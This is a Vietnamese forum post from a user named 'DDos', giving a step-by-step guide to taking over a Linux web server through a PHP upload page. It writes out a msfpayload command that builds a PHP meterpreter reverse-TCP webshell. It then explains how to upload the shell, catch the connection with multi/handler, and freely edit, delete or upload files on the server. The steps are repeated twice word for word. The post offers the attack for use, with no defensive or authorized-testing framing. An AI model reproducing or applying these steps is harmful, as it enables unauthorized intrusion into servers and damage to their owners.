DDos
VIP Members
-
22/10/2013
-
524
-
2.191 bài viết
Rooting Linux server sử dụng PHP meterpreter webshell
Giả sử bạn tìm thấy một trang upload trên một site (cho phép upload php) trên một Linux Server. Đầu tiên, bạn cần tạo ra một php payload, upload nó lên server, thực hiện nó để nhận được một meterpreter session. Bây giờ, với meterpreter session này, bạn có thể upload bất kỳ thứ gì bạn muốn, thực hiện việc root server.
Bước 1: Tạo payload sử dụng metasploit
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=4444 R>ddos.php
Sau đó, bạn sẽ nhận được file ddos.php
Bước 2: Upload file này lên webserver.
Bước 3: Sử dụng module multi/handler để thiết lập việc khai thác
Bước 4: Bây giờ, bạn cần thực hiện upload payload trên server, đi tới thanh địa chỉ và nhập đường dẫn tới file vừa upload. Bạn sẽ nhận được một meterpreter từ webserver tới máy của bạn.
Bạn có thể chỉnh sửa, xóa, upload file tùy ý trên webserver.
Bước 1: Tạo payload sử dụng metasploit
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=4444 R>ddos.php
Sau đó, bạn sẽ nhận được file ddos.php
Bước 2: Upload file này lên webserver.
Bước 3: Sử dụng module multi/handler để thiết lập việc khai thác
Bước 4: Bây giờ, bạn cần thực hiện upload payload trên server, đi tới thanh địa chỉ và nhập đường dẫn tới file vừa upload. Bạn sẽ nhận được một meterpreter từ webserver tới máy của bạn.
Bạn có thể chỉnh sửa, xóa, upload file tùy ý trên webserver.
Chỉnh sửa lần cuối bởi người điều hành: